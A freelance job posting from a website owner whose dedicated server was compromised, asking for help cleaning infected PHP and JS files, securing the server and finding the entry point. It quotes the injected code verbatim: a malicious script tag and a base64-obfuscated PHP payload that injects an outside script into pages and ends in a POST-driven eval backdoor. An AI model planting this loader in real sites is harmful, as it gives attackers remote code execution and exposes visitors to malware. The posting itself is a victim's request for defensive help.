Server has Been Comprimised - Malware in my website files
$30-250 USD
In Progress
Posted about 14 years ago
$30-250 USD
Paid on delivery
Hi
I have a dedicated server. i have one website hosted on it. [login to view URL]
The website at [login to view URL] contains elements from the site [login to view URL], which appears to host malware
There are also errors in your statistics/logs/error_log file that may help you resolve this issue.
Many of my .php and .js files have been injected with a redirect script.
example 1 - <script src=[login to view URL] ></script><body>
example 2 -
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3Rrd3MnKSl7ZnVuY3Rpb24gZ3Rrd3MoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM1l0ZEhkcGJtSmhjaTVqYjIwdmMybDBaUzlqYjI1MFlXTjBMWFZ6ZUM1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBndGt3czIoJGEsJGIsJGMsJGQpe2dsb2JhbCRndGt3czE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGd0a3dzMSkpY2FsbF91c2VyX2Z1bmMoJGd0a3dzMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZ3Rrd3MnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdndGt3cycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRndGt3c2w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2d0a3dzMicpKSE9J2d0a3dzMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>
As a result there is a google warning for my website.
Warning - visiting this web site may harm your computer!
Reported Attack Page!
This web page at [login to view URL] has been reported as an attack page and has been blocked based on your security preferece.
Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.
Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
I need someone to to liase with me, and be be able to check the apache log files and
1. identify the files and clean up the code, and remove the redirect script
2. secure the server so it does not get compromised again, and help me change the password etc
3. find out how my server was compromised ie weak php code and to fix it etc
You will need good php and server skills
only expericance people please.
i need my site up and running soon asap,